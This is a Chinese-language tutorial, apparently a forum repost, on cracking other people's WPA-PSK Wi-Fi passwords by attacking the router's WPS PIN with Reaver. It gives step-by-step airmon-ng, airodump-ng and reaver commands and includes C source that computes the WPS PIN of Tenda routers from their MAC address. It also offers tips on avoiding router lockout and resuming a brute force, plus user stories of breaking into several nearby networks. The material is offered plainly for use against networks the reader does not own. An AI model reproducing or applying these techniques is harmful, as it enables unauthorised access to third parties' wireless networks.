破解WIFI无线网络密码之使用Reaver PIN码破解WPA-PSK密码

破解WIFI无线网络密码之使用Reaver+PIN码破解

WPA-PSK密码

使用Reaver+PIN码破解WIFI无线网络WPA-PSK密码：之前掌握到的破解WPA-PSK密码仅限于使用aircreack工具包获取handshake后挂字典爆破方式，而能否破解出wpa密码完全依赖于字典强度了。除了该方式外还有一个更有效的办法，就是使用路由PIN码然后使用BT5下自带的Reaver工具秒破WPA-PSK密码！

在已知PIN码的情况下可以在BT5下使用reaver -i mon0 -b AP‘s Mac -p pin 直接秒破！

现在比较难的就是怎么得到PIN的问题了，经常关注无线这方面的朋友应该知道现在腾达和磊科产品有保PIN算法漏洞，如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值，然后使用PIN值直接连接或者继续使用PIN值加reaver破解出wpa-psk。

除此之外，根据PIN特点同样也可以使用Reaver来穷举，pin码是一个8位数前四位是随机生成的而后4位是3个数字加1个checksum大大降低了穷举所需要的时间。

在BT5下可以使用reaver -i mon0 -b AP's Mac -vv 来破解，这个过程可能需要花很多个小时，在网上有看到是3-10个小时，具体的我还未验证。reaver在此过程中还会保存进度（/usr/local/etc/reaver/AP’s MAC.wpc）到文件。

不过使用PIN方法破解WPA-PSK密码有一个限制，就是AP必须开启了QSS、WPS功能！我们可以在扫描AP的时候判断目标AP是否开启了QSS、WPS功能，如下图使用airodump-ng 扫描时候在MB栏中后面有个“.”的就是。

或者在win7下面，连接AP时候在密码输入框下面有“通过按路由器按钮也可以连接”字样也是开启了QSS、wps的。

“C83A35”或“00B00C”打头路由PIN计算工具源码，大家可以自己编译：

//Computes PIN code starts with OUI "C83A35" and "00B00C"

//Both two OUIs which belonged to Tenda Technology Co., Ltd are confirmed effectively.

//Coded by Zhaochunsheng - https://www.sodocs.net/doc/f06690859.html,

//Modified by Lingxi - https://www.sodocs.net/doc/f06690859.html,

#include

#include

#include

int main()

{

unsigned int wps_pin_checksum(unsigned int pin);

int PIN = 0;

// printf("ComputePIN-C83A35\n");

printf("Description:\n");

printf("If your wireless router MAC address start with \"C83A35\" or \"00B00C\",\n");

printf("type the other six digits, you might be able to get the \n");

printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");

printf("Code by ZhaoChunsheng 04/07/2012 https://www.sodocs.net/doc/f06690859.html, \n\n");

printf("Modified by Lingxi - https://www.sodocs.net/doc/f06690859.html,\n\n");

//Translated to Chinese

printf("说明：\n");

printf("如果您的无线路由器MAC地址以“C83A35”或“00B00C”打头，\n");

printf("输入后六位MAC地址（不分大小写）您或许可以获得该路由的WPS PIN密钥！\n"); printf("祝你好运！\n\n");

printf("由赵春生编写于2012年4月7日https://www.sodocs.net/doc/f06690859.html,\n");

printf("由灵曦修改并汉化https://www.sodocs.net/doc/f06690859.html,\n\n");

printf("请输入后六位MAC地址（HEX）：\n");

printf("Input the last 6 digits of MAC Address(HEX):");

scanf("%x",&PIN); printf("Last 6 digits of MAC Address(HEX) are: %X\n",PIN);

printf("WPS PIN is: %07d%d\n",PIN%10000000,wps_pin_checksum(PIN%10000000));

return 0;

}

unsigned int wps_pin_checksum(unsigned int pin)

{

unsigned int accum = 0;

while (pin)

{

accum += 3 * (pin % 10);

pin /= 10;

accum += pin % 10;

pin /= 10;

}

return (10 - accum % 10) % 10;

}

pin码破密特点：

========

1、不需要客户端，

2、有PIN码就能获得无线密码，

3、八位数PIN码实际只有一万一千组随机密码，

而PIN破密，只要开启WPS，破密只是个时间问题。

如果你知道了PIN码，那么你就要输入下面一段代码来取得对方的密码

reaver -i mon0 -b (AP的MAC) -p pin码

========

reaver使用方法、步骤：

========

打开超级终端ROOt shell

如果电脑装有多个无线网卡，请先发指令

ifconfig -a

========

确认你用哪一个网卡WLAN0或WLAN1

下面的指令都是以单一网卡WLAN0为例

========

一、激活监听模式：

========

airmon-ng start wlan0

========

二、查看周边AP信息（抓包）：

========

airodump-ng mon0

========

观察要破AP的PWR信号强弱变化，注意同频干扰，调整网卡放置位置和角度、方向。PWR 小于-75 基本上会Timeout, PWR-60左右,则非常顺畅(3-6秒攻击一次)

三、按Ctrl+C终止抓包

========

四、抓PIN码：

========

reaver -i mon0 -b MAC -vv

========

例如：

========

reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv

注意，MAC中冒号不可省略，MAC地址的字母大小写均可，-vv是两个V不是W！

特别提示：

========

只有AP开启了WPS、QSS功能，才可以用PIN法破PSK密码!

如何查看AP是否开了WPS、QSS呢？

一、使用指令

========

airodump-ng mon0

MB一栏下，出现

54e. （看清楚有点“.”）是开WPS的

========

二、WIN7下，用通常的方式连接AP，如果在提示输入密码框下面，出现“通过按路由器按钮也可以连接”，

就确认此AP开了WPS、QSS。

但是，WIN7下不出现“通过按路由器按钮也可以连接”，不等于100%没开WPS。

还是54e. 准。

AP关闭了WPS、或者没有QSS滴，会出现

WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)

PIN破密对信号要求极为严格，

如果信号稍差，可能导致破密进度变慢或者路由死锁等（重复同一个PIN码或timeout）。特别是1、6默认频道中，有较多的AP，相互干扰

因此，确定网卡放置的最佳位置、方向、角度十分重要。

快速、简易确定对方无线路由器AP方位的技巧---探寻最佳信号接收位置

PJ过程中，重复同一个PIN码或timeou t 可随时随地按Ctrl+C终止，reaver会自动保存进度。

重复第2-4项内容，先看看AP信号强弱或是否关机，

若继续破，则再次在终端中发送:

reaver -i mon0 -b MAC -vv

这条指令下达后，会让你选y或n，选y后就继续了

当reaver确定前4位PIN密码后，其工作完成任务进度数值将直接跳跃至90.9%以上，也就是说只剩余一千个密码组合了。总共一万一千个密码。

曙光就在前头，胜利往往在再坚持一下的努力之中。

如果，90.9%进程后死机或停机，请记下PIN前四位数，用指令：

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)

会从指定PIN段起破密。

如何保存破密进程呢：

reave的进度表文件保存在

1.3版：/etc/reaver/MAC地址.wpc

1.4版：/usr/local/etc/reaver/MAC地址.wpc

用资源管理器，手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中，

下次重启动后，再手工复制到/etc/reaver/ 目录下即可。

timeout时，可适当调整网卡方位，在同一PIN数值反复测试,可Ctrl+C终止破密，让路由器休息几十秒，是不错的选择，否则个别型号AP会自锁PIN连接功能。另外，如果只用-vv 指令的，建议再加上-a和-S提高效率

用u盘启动xiaopanos可以保存进度，重启不会丢失，方法如下：

打开桌面最后边一个图标xfec 定位到/etc/reaver下，

有一个wpc后缀的文件，名字是你PJ的mac地址，复制到你的U盘，路径是/mnt/sdb1（一般是这个，自己找找，要是没有东西就右键mount），

以后重启到xiaopanOS，把这文件复制到原来的路径，再试试，可以载入进度了！

运气好，431秒破密！

一天破了3个，最后一个中500W了，几十秒确定前4，整个PJ不到3分钟

ZT实战经验贴:

这个信号强度75%，比一般好点吧。抓包不知多少次，就是抓不到。

现在终于有了PIN这个好东东。

系统是小胖0.32+虚拟机，网卡是TOTOLINK N200UA，对方路由器是迅捷的，每次pin都只能前进7%多点，然后就停止了，对方路由器没信号了。不死心啊，不能就这样结束啊！就想了这样的办法：继续上次的快照后，快到7%的时候，按CTRL+C 手动停止PIN。10分钟后，再继续PIN，进度增加大约7%的时候，再停10分钟......就这样反复。到了30%多的时候，进度一下子窜到92%，那个喜啊！--前4位搞定了。又用了半个多小时（中间手动停止一次），终于大功告成，总耗时3小时多。

不多说了，告诉童鞋们要有耐心，要坚持到底！！(/b)